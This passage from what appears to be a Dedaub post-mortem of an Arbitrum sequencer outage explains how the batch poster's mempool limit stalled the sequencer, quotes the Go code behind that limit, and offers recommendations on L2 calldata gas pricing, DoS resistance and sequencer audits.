    Now, look at the architecture diagram of Arbitrum below. Note that in order to commit transaction sequences to L1, the data poster needs to post the increased amount of data over a larger number of transactions. Prior to the outage, the number of transactions posted per hour was around 10 – 20x higher than the December mean.

    However, the code responsible for posting these transactions has an in-built limitation that imposes limits to the rate at which L1 batches are posted. Prior to the outage, if there are 10 batches still in the L1 mempool, no more batches are sent to L1, stalling the sequencer. This limit was subsequently raised to 20 batches after the outage. This is probably not a good long-term solution however, as it increases the chances of batches needing to be reposted due to transaction nonce issues.

    // Check that posting a new transaction won't exceed maximum pending
    // transactions in mempool.
    if cfg.MaxMempoolTransactions > 0 {
      unconfirmedNonce, err := p.client.NonceAt(ctx, p.Sender(), nil)
      if err != nil {
        return fmt.Errorf("getting nonce of a dataposter sender: %w", err)
      }
      if nextNonce >= cfg.MaxMempoolTransactions+unconfirmedNonce {
        return fmt.Errorf(
          "... transaction with nonce: %d will exceed max mempool size ...",
          nextNonce, cfg.MaxMempoolTransactions, unconfirmedNonce
        )
      }
    }
    return nil

    Batch poster is responsible for posting the sequenced transaction sequence as Ethereum calldata.

    Arbitrum Sequencer Outage | Recommendations

    There are several indications that point towards the sequencer, and thus the network, not being tested enough in a realistic setting or in an adversarial environment. However, luckily the upcoming Proto-Danksharding upgrade to Ethereum should also help for reducing L1-induced congestion. Irrespective of this the Arbitrum engineers can consider the following recommendations:

    • Whether the Arbitrum gas price of L2 calldata is set too low, compared to other kinds of operations. Gas is an anti-DoS mechanism, which is intimately tied to the L1 characteristics. If this increase in L2 calldata causes a proportionally large increase in batch size, then attackers can craft L2 transactions with large calldatas that result in batches that don’t compress well under Brotli compression, causing a DoS attack on the sequencer. Note that Arbitrum Nova should not suffer as much from this issue as the transaction data is not stored on L1, only a hash is.
    • Whether there is a tight feedback loop between the size of the L1 batches currently in the mempool and L2 gas price. There is an indirect feedback loop, via the gas price on L1 and backlog sizes, but this may not be too tight. In addition, since the sequencer is centralized anyway, anti-DoS measures might be encoded directly into it to reject transactions. (Note: A more decentralized sequencer is being considered for the future, so this last measure wouldn’t work)
    • Long-term, the engineers more research into making the rollups more efficient to decrease the sizes of batches committed to L1. This may include ZKP rollups at some point.
    • Additionally, security audits to the sequencer should consider DoS situations, both through simulation/fuzzing and also by having auditors think of hostile situations through adversarial thinking based off their deep knowledge of the involved chains.

    Finally, the Arbitrum team made a small change to the way transactions are soft-committed. In this change the feed backlog is populated irrespective of whether the sequencer coordinator is running, which carries its own risks but enables dApps running on Arbitrum to be more responsive during certain periods.

    Disclaimer: The Arbitrum sequencer is solely operated by Offchain labs. Thus, most of the information regarding its operational issues (such as logs) are not publicly available so it’s hard to get a complete picture of the issue. Dedaub has not audited Arbitrum or Offchain labs software. Dedaub has however audited other (non-Arbitrum) software and projects running on Arbitrum such as GMX, Chainlink, Rysk & Stella.